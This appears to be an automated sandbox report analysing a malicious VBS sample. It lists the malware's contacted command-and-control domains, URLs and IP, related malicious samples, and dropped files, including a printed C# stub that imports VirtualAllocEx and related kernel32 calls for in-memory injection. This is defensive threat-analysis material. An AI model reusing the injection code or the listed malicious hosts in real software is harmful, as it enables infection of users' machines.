                    http://atl.bigbigpoppa.com/yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    resolver1.opendns.com
                    208.67.222.222
                    truefalse
                      high
                      art.microsoftsofymicrosoftsoft.at
                      185.251.90.253
                      truetrueunknown
                      atl.bigbigpoppa.com
                      185.251.90.253
                      truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://art.microsoftsofymicrosoftsoft.at/M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7strue
                      • Avira URL Cloud: safe
                      unknown
                      http://art.microsoftsofymicrosoftsoft.at/08OHsz1N1FvuG6kjmE/aTh0zMsnZ/SI0oUmCO_2BS5MoLEECj/uZ7K5bJdnYQx3WN05uH/v_2Fm83_2BmFHvZHPW65zA/GW0_2BJDiUD1w/ZK6b_2Bh/StY6HpePFkaOsmwn5z64jk4/hNqOPWlFAk/QdUHTQ0be2zDX_2Bp/gFERm0UEw08y/zSKvozh3BGq/IuojbbR5mE_2FM/dq0z5j8vfE1Mb6ztPRP2X/B41DadMfELfCe7ey/X881VUbPPRiD756/vcgjm_2B6diCc8QiJ8/zWiCv09og/LPjcs0IySRyGzo4FtAjY/MaQN7Yj0rwdcUGBU3Lw/cxZIrRpMI9kt/XnFePhCWR/vtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://art.microsoftsofymicrosoftsoft.at/W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/ttrue
                      • Avira URL Cloud: safe
                      unknown
                      http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/dtrue
                      • Avira URL Cloud: malware
                      unknown
                      http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/rtrue
                      • Avira URL Cloud: malware
                      unknown
                      http://atl.bigbigpoppa.com/yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oWtrue
                      • Avira URL Cloud: malware
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmpfalse
                        high
                        http://constitution.org/usdeclar.txtrundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmpfalse
                          high
                          https://contoso.com/powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmpfalse
                            high
                            http://constitution.org/usdeclar.txtC:rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWrundll32.exe, 00000012.00000003.809344105.0000000000B86000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://atl.bigbigpoppa.com/rundll32.exe, 00000012.00000002.870125823.0000000000B1A000.00000004.00000020.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44eurundll32.exe, 00000012.00000003.797288272.0000000000B78000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000016.00000002.872464143.00000200AE0A1000.00000004.00000001.sdmpfalse
                              high
                              https://github.com/Pester/Pesterpowershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmpfalse
                                high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                185.251.90.253
                                art.microsoftsofymicrosoftsoft.atRussian Federation
                                35278SPRINTHOSTRUtrue

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:481106
                                Start date:10.09.2021
                                Start time:11:09:14
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 10m 40s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:sample.vbs
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winVBS@22/20@7/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 24% (good quality ratio 22.9%)
                                • Quality average: 80.3%
                                • Quality standard deviation: 28.7%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .vbs
                                • Override analysis time to 240s for JS/VBS files not yet terminated
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 20.82.209.183, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 23.211.4.86, 20.82.210.154
                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                11:13:06API Interceptor1x Sleep call for process: wscript.exe modified
                                11:13:44API Interceptor3x Sleep call for process: rundll32.exe modified
                                11:13:58API Interceptor41x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                185.251.90.253345678.vbsGet hashmaliciousBrowse
                                  start[526268].vbsGet hashmaliciousBrowse
                                    URS8.VBSGet hashmaliciousBrowse
                                      documentation_446618.vbsGet hashmaliciousBrowse
                                        start_information[754877].vbsGet hashmaliciousBrowse
                                          start[873316].vbsGet hashmaliciousBrowse
                                            documentation[979729].vbsGet hashmaliciousBrowse
                                              run_documentation[820479].vbsGet hashmaliciousBrowse
                                                run[476167].vbsGet hashmaliciousBrowse
                                                  run_presentation[645872].vbsGet hashmaliciousBrowse
                                                    documentation[979729].vbsGet hashmaliciousBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      resolver1.opendns.com345678.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      start[526268].vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      documentation_446618.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      start[873316].vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      6bI5jJ1oIXeI.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      nostalgia.dllGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      Lbh0K9szYgv5.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      ursi.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      OcEyzBswGm.exeGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      u0So5MG5rkxx.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      PIfkvZ5Gh6PO.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      Ry1j2eCohwtN.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      Invoice778465.xlsbGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      9uHDrMnFYKhh.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      ursnif.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      8ph6zaHVzRpV.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      Cetu9U5nJ7Fc.vbsGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      vntfeq.dllGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      231231232.dllGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      gbgr.dllGet hashmaliciousBrowse
                                                      • 208.67.222.222
                                                      art.microsoftsofymicrosoftsoft.at345678.vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      start[526268].vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      documentation_446618.vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      start[873316].vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      6bI5jJ1oIXeI.vbsGet hashmaliciousBrowse
                                                      • 194.226.139.129
                                                      nostalgia.dllGet hashmaliciousBrowse
                                                      • 194.226.139.129
                                                      Lbh0K9szYgv5.vbsGet hashmaliciousBrowse
                                                      • 194.226.139.129
                                                      ursi.vbsGet hashmaliciousBrowse
                                                      • 193.187.173.154
                                                      u0So5MG5rkxx.vbsGet hashmaliciousBrowse
                                                      • 193.187.173.154
                                                      PIfkvZ5Gh6PO.vbsGet hashmaliciousBrowse
                                                      • 193.187.173.154
                                                      Ry1j2eCohwtN.vbsGet hashmaliciousBrowse
                                                      • 185.180.231.210
                                                      Invoice778465.xlsbGet hashmaliciousBrowse
                                                      • 185.180.231.210
                                                      9uHDrMnFYKhh.vbsGet hashmaliciousBrowse
                                                      • 185.180.231.210
                                                      ursnif.vbsGet hashmaliciousBrowse
                                                      • 185.180.231.210
                                                      8ph6zaHVzRpV.vbsGet hashmaliciousBrowse
                                                      • 185.180.231.210
                                                      Cetu9U5nJ7Fc.vbsGet hashmaliciousBrowse
                                                      • 185.180.231.210
                                                      vntfeq.dllGet hashmaliciousBrowse
                                                      • 95.181.163.74
                                                      231231232.dllGet hashmaliciousBrowse
                                                      • 95.181.163.74
                                                      gbgr.dllGet hashmaliciousBrowse
                                                      • 95.181.163.74
                                                      B9C23PuJnfNI.vbsGet hashmaliciousBrowse
                                                      • 95.181.163.74

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      SPRINTHOSTRU345678.vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      start[526268].vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      ZaRfpqeOYY.apkGet hashmaliciousBrowse
                                                      • 141.8.192.169
                                                      URS8.VBSGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      h4AjR43abb.exeGet hashmaliciousBrowse
                                                      • 185.251.88.208
                                                      documentation_446618.vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      start_information[754877].vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      dAmDdz0YVv.exeGet hashmaliciousBrowse
                                                      • 185.251.88.208
                                                      start[873316].vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      documentation[979729].vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      run_documentation[820479].vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      run[476167].vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      run_presentation[645872].vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      yXf9mhlpKV.exeGet hashmaliciousBrowse
                                                      • 185.251.88.208
                                                      mgdL2TD6Dg.exeGet hashmaliciousBrowse
                                                      • 185.251.88.208
                                                      documentation[979729].vbsGet hashmaliciousBrowse
                                                      • 185.251.90.253
                                                      Pi2KyLAg44.exeGet hashmaliciousBrowse
                                                      • 185.251.88.208
                                                      oClF50dZRG.exeGet hashmaliciousBrowse
                                                      • 185.251.88.208
                                                      2K5KXrsoLH.exeGet hashmaliciousBrowse
                                                      • 185.251.88.208
                                                      1fbm3cYMWh.exeGet hashmaliciousBrowse
                                                      • 185.251.88.208

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      C:\Users\user\AppData\Local\Temp\fum.cpp345678.vbsGet hashmaliciousBrowse
                                                        start[526268].vbsGet hashmaliciousBrowse

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):11606
                                                          Entropy (8bit):4.883977562702998
                                                          Encrypted:false
                                                          SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                          MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                          SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                          SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                          SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                          Malicious:false
                                                          Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          C:\Users\user\AppData\Local\Temp\RESB252.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2192
                                                          Entropy (8bit):2.7196818081262806
                                                          Encrypted:false
                                                          SSDEEP:24:eat7aHXIRfhKdNfI+ycuZhN2akSOPNnq9SpKEFm9c:bU4R5Kd91ul2a3Sq9I
                                                          MD5:132689FC7B44DFFB6FB5FF5FEF6D26BA
                                                          SHA1:9D68B487474E17811412DF9DC7309D3215C5C532
                                                          SHA-256:3E70C463797F8520F7A6983985BBF267C1A8548E76D62EA3AA141E8A46DD1C3D
                                                          SHA-512:5AB00554FA9AAD6D99920BC001FDF502B53ED981D6301DC3E556C3455A3E05ADAB858CD522ACA4F668E56532073B05569E9DD363AFA3A53332449EA5E559B97D
                                                          Malicious:false
                                                          Preview: ........W....c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP..................3.@...A.B._............7.......C:\Users\user\AppData\Local\Temp\RESB252.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESC397.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2192
                                                          Entropy (8bit):2.713384442892568
                                                          Encrypted:false
                                                          SSDEEP:24:ea9aVnvgaHLhKdNfI+ycuZhNdYNakS8YCPNnq9SpDEFm9c:b9w1Kd91ulCNa3LOq9x
                                                          MD5:D377A1E40B0BEE977688A3EE50D603F7
                                                          SHA1:45F0E30AC08124218D07AF06F6120BBB49A55062
                                                          SHA-256:EE727E84C2CE25F3232AD9B4CEE952177C605C845FF50D871FE1B9AFEE2A0BB0
                                                          SHA-512:2D34E5926266A6FBBB03827F53A90A4AB29675FD95D416F7E54801DB334C493212609B9D9DA139301B1292A2EB5AA6CB21FE639D3A0F0CEE4B19031ADC8E9AFA
                                                          Malicious:false
                                                          Preview: ........W....c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP.................!.!-....:..H..V..........7.......C:\Users\user\AppData\Local\Temp\RESC397.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlng44lx.iid.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nre1bpnm.vkr.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\adobe.url
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):108
                                                          Entropy (8bit):4.699454908123665
                                                          Encrypted:false
                                                          SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                                                          MD5:99D9EE4F5137B94435D9BF49726E3D7B
                                                          SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                                                          SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                                                          SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                                                          Malicious:false
                                                          Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                                                          C:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1047407027966525
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynYNak7Ynqq8YCPN5Dlq5J:+RI+ycuZhNdYNakS8YCPNnqX
                                                          MD5:88218E212D96EB16133ABFF948BD8E56
                                                          SHA1:24863DA33DE10BD5DAB5E70A13A60F4F221071B5
                                                          SHA-256:6A0071564BA9EBE5AC747CF5B844D23A32BEE6E9170F77D5A5D2AD8E9733AFBD
                                                          SHA-512:627015D627D592A75D41B98A64DB58D4CF8B7B0CD05E41B07FEA419E78BCB3C34881C4A7329571C7FEB45AB2662C4C2975496BF9AF663E10CF0CEBCE99A314AD
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.s.h.x.v.r.3.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.s.h.x.v.r.3.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):421
                                                          Entropy (8bit):5.017019370437066
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                          MD5:7504862525C83E379C573A3C2BB810C6
                                                          SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                          SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                          SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                          Malicious:true
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):375
                                                          Entropy (8bit):5.235232918611443
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723f11b0zxs7+AEszIN723f117BH:p37Lvkmb6K2aN1b0WZETaN1t
                                                          MD5:28CA1C15ED722DFD4F2D1F6901EE48B1
                                                          SHA1:AD976031236D1882E6DF10A5C2B33106194577B4
